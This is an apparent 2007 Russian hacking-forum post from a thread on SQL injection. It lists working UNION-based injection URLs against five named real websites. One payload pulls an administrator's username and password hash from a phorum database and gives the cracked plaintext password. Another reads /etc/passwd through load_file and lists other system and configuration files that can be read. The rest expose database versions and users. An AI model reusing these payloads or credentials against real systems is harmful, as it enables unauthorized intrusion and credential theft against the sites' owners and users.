Тема: SQL Инъекции
Показать сообщение отдельно

  #3717  
Старый 15.11.2007, 20:26
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию
http://www.sibdosug.com/
Код:
http://www.sibdosug.com/type.php?type=-4+union+select+concat(username,char(58),password)+from+phorum_users+where+admin=1/*
Версия: 4.1.22
Юзверь: sibdosug_db2@88.214.192.33
Код:
http://www.sibirdosug.com/phorum/admin.php
-
admin:9da3bd1c75d51cc5da6a4fa573e269cd:slec700
Сенькс фор брутед хэш ту Iceangel_ =)

http://www.shark.ru/
Код:
http://www.shark.ru/catalog.php?rid=-37+union+select+1,load_file('/etc/passwd'),3,4,5,6,7/*
Version: 4.0.22-standard
User: root@localhost
Также можно прочитать: /etc/hosts, /etc/services, /etc/group, /etc/profile, /etc/bashrc, /etc/skel/.bashrc, /etc/php.ini, /etc/httpd/conf/httpd.conf

http://www.b-connect.ru/
Код:
http://www.b-connect.ru/view.php?id=-1155'+union+select+1,2,concat(version(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Version: 4.0.26-log
User: Uwww3901S@localhost

http://www.rapida.ru/
Код:
http://www.rapida.ru/news.php?id=-22'+union+select+1,2,aes_decrypt(aes_encrypt(concat(version(),0x3a,user()),0x71),0x71),4+from+news/*
Version: 4.1.14
User: rap_app@server2.int.rapida.ru

http://www.strasty.ru/
Код:
http://www.strasty.ru/disk.php?id=-996+union+select+1,2,3,concat(version(),char(58),user()),5/*
Version: 4.1.20-log
User: a2856_strasty@localhost
Последний раз редактировалось 0nep@t0p; 15.11.2007 в 20:30..
 
Ответить с цитированием